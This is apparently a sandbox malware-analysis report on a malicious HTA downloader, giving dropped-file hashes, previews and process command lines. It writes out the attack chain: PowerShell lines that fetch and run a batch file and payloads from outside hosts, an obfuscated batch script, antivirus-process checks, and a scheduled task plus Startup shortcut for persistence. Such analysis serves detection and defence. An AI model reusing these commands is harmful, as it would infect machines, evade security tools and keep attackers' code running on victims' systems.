SHA-512:	E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\c2.bat

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (904), with CRLF line terminators
Category:	dropped
Size (bytes):	3634
Entropy (8bit):	5.236008723707643
Encrypted:	false
SSDEEP:	96:m+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:oCjaob3Z2SnE8tSqCB9Y
MD5:	87022BBA9DB0F800B26D9609ACBBCF49
SHA1:	D7BE8CC8D4CFFCCE0BD7D361037BBE575E49CC6A
SHA-256:	1F6CE0F5CD3793AAEA9B3F9DE99F04679B8DB2F1056532982D835E665006ECE7
SHA-512:	B7BE35A7A8EF40CF5326EFD77EB4A2EE05162B241267695C6927F12340BE3720AF299D37AFB5F02025EF8948E71C8A4F8CC21B5C805C9DD777797694C033D53F
Malicious:	true
Preview:	@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%..set url=https://myguyapp.com/msword.zip..s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%..set url2=https://myguyapp.com/W2.pdf..s%hwvwRF%e%QuDLrd%t%JICNv% %PxorhwP%u%aYH%r%hotHXeBZtg%l%oJKbuFDbgq%2%yHfekdVP%=%NdKRoGUgr%h%xKSx%t%rvRKBSleIX%t%SpSm%p%wbQdk%s%R%:%Dizx%/%HHLDZ%/%es%m%XjoF%y%J%g%olMBNbeo%u%DVZtkXm%y%MsH%a%LyuRF%p%Eryft%p%idiglSH%.%odKAWwiYof%c%CtLK%o%KjljBrysB%m%o%/%GQYaqs%W%LDmDZbmha%2%sFQKV%.%vIMk%p%VuXimjsr%d%acamBo%f%nrMe%..p%wsZX%o%zbulUZgp%w%inxp%e%aiWTgYV%r%KUWANAEWb%s%oDEk%h%gPNeE%e%ibNOiBI%l%LHUUm%l%ETUgg% %jDR%-%GUoW%W%j%i%OZUiVG%n%xC%d%EvHpV%o%BVeSOp%w%kLnyCABxV%S%Xb%t%IKytjHq%y%Pw%l%jYJgLlEn%e%cWXrPRDt% %xRzJFYoSU%H%BYa%i%aNxNnfpSO%d%mJLHttj%d%PEn

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3291904
Entropy (8bit):	5.7211736584910335
Encrypted:	false
SSDEEP:	24576:1SPkwlaGwxOe3J7k4b6ioP8ZbmrJju41nK4AzaVQeAYgIBlu:10wMe3Lb6R8Zbm59K4PVgI3u
MD5:	612EC869CA4C87B5BF6C1B44522FDA28
SHA1:	43E7850657B61E9AC7341413C203C6E834266EA7
SHA-256:	AB2B6D3C849A207A93CFEC18A684EF980AE681C4F901A3B12858A2C3AC05ECCC
SHA-512:	BE5BE0BDB010FB4EA58CED7FB45731FB720B6AFBBDCAA1E971CE9B278CDE71F7C8E73D28A0FA8744F1604FF176A50032D63B9F5850909133CD113E69B2A53EA5
Malicious:	true
Preview:	PK........n.(Z.............. .msword.exeux.............UT....V~g.e~g.e~g.{\|T..?~..dI6.".F..!(...M\..rB.Y\Xw..pQ..+.M....%n..............V."&.$(.(<..\|.H...u.......3s6..{.....~.5{...g>...g......A.............o?..+^..0.OW....t.....Uu+.[r_..KV.X)..UST..(Z....6..}+..L....6.........t..5.4.=.........K...R+{.b...\.&.(.U.La.....i..c....xIe..tA.P.'.....7.B.......1.C.{..G..O3.Hy.....7......!..._......C...^..8.....r.Z....g.D}....H..O.[.D^".w]....#.....L......[....?.W...+..N. .d.=..&....8..p#L...i..f.Jd..A.../G.W..........P{"=.".v.<.......F..j...3.h..+N]..M....G...$...:....b.3>..1\|....Q.....'..6$#5IA.Y..e.h..b.\........y.Ws<.n...I=.u:^lk.E.<d..t........U/...S9...D...y..........zSz~%..I...q..z.f@.+y....Y..4....G..5..Iz~.J.@s..P..aS.C<N$.!j pA..!..z^H.}..K.<...~HB...a]j.M.R.b-..;.....h....;..ZUlm.O..e.........f9...er...=.Z_...l/}...l~...n.-3....[.!.ok.+.%.}.N%G....L..D.2.....;.-.i.q.3G.....nP.bY..P+l......X\|.,..v9+.#Za...7.........:b.M.Hv

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	597659152
Entropy (8bit):	4.333929871564731
Encrypted:	false
SSDEEP:
MD5:	2418E6B81076BF97B0D0659309561185
SHA1:	5C9393008097E0C2EE82197E46CA879B0156D15D
SHA-256:	9DCF3E57C4962A4C5BA0866AF3C16E7D16427448FD75E1D78F7C3D9A70675BFA
SHA-512:	339267CBCD9073BD21FEC145814F73D0165FE58F1DB306F2AE678780C691B32C9B9C46C3218848D9EE34BD4A2669B23E6A792735FA5351391B8B33632C3EB54D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8............@....................................#..@.................................4........@...2......................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....2...@...4..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	98682
Entropy (8bit):	6.445287254681573
Encrypted:	false
SSDEEP:	1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
MD5:	7113425405A05E110DC458BBF93F608A
SHA1:	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
SHA-256:	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
SHA-512:	6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
Malicious:	false
Preview:	0...u0...\...0....H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...\|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	737
Entropy (8bit):	7.501268097735403
Encrypted:	false
SSDEEP:	12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
MD5:	5274D23C3AB7C3D5A4F3F86D4249A545
SHA1:	8A3778F5083169B281B610F2036E79AEA3020192
SHA-256:	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
SHA-512:	FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
Malicious:	false
Preview:	0...0.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0....H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R.......~....)....i.n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.889436845812483
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
MD5:	A34A0DAF277C13FC5AFF64C0A7247999
SHA1:	FD9B47B23BD20B9903D8842AC8C17A9F96677E93
SHA-256:	1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
SHA-512:	7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..

C:\Users\user\Downloads\W2.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	69437
Entropy (8bit):	7.717554924401452
Encrypted:	false
SSDEEP:	768:fGPGTXkz5QcYykzbvwj42yCuTP1mRPLHLxqf/f8LcivAM7jQlVdl8gbUvjODSrY5:o3z5jkzbvWg1qzndS1zSrpaaW
MD5:	296FBCEB79C89BCFFD636CB2D80C57F7
SHA1:	7AC0E8C3BBCA5B78289EC48D0785B03DE4E1F581
SHA-256:	568CB24BFE35FD292AA0923413E1707B057A281059759AF52FC4392F901A8383
SHA-512:	902BB7F56B5E5C49B8798154B5A79B0D820C41308A0BAA1346CBB2FE0C04BB2D6A756D27AF598E59EC0A688FBB19351F42338E58EE6DE2EC8A87566130EE7929
Malicious:	true
Preview:	%PDF-1.4.%.....1 0 obj.<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(......)]/DecodeParms<</BitsPerComponent 1/Predictor 15/Columns 2549/Colors 1>>/Intent/Perceptual/BitsPerComponent 1/Filter/FlateDecode>>stream.x...Mo...y.^..Q@.3.w..x9...z#...q. ...\|...U-...(5J%Re..^.f..F.m.".N..P/..7P(.J....Z....9...C.h....w.w......dO2}D..#A.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.

Static File Info

General

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.773466281011212
TrID:	HyperText Markup Language (12001/1) 40.67% HyperText Markup Language (11501/1) 38.98% HyperText Markup Language (6006/1) 20.35%
File name:	c.hta
File size:	1'224 bytes
MD5:	4fadf00aa57b7ca6bcb6b02cb338c0b2
SHA1:	ceb81e97c94c5655d1743114044f505184ddead2
SHA256:	8da5bb4d9cfd29718720e839bb75ee58f92b6e41f0181b6eede4234d3122dab6
SHA512:	99f25e03da69b6afded6be3b07bf7bdd90a2e7a08663cf4b9183674e4c0cdf6ad61c400b212341d84b3f82fa2ee1ccf9e1362d7f8b21460b6bc6a6612c897c2c
SSDEEP:	24:I5ATsWh2cpwg5ilnOH9qQI0gj+ILhH/8JoMCO:GOhh2g5i5OdqQI0g7dH/w/CO
TLSH:	60212D2BF86FC878957A84E214AADC48F68903134388A88B705C10A36F7E38B42C20DD
File Content Preview:	<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="app".. APPLICATIONNAME="Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKBAR="no"..

Target ID:	0
Start time:	22:18:59
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c.hta"
Imagebase:	0xa0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:18:59
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"
Imagebase:	0x320000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:18:59
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:19:01
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:19:02
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x320000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:19:04
Start date:	11/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:19:04
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x320000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:19:05
Start date:	11/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x800000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:19:05
Start date:	11/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1576,i,16045763869341166772,13330645250121151550,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	22:19:14
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x320000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:19:34
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	597'659'152 bytes
MD5 hash:	0DE162AA65BC5DAE2145333A0D1F8801
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 16%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:19:36
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:19:36
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:19:37
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:19:37
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:19:38
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:19:38
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 361684
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Approaches
Imagebase:	0x6c0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Korea" Measurement
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Wow64 process (32bit):	true
Commandline:	Propose.com U
Imagebase:	0xa00000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	22:19:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xdd0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:19:40
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:19:40
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:19:40
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0xa10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:19:40
Start date:	11/01/2025
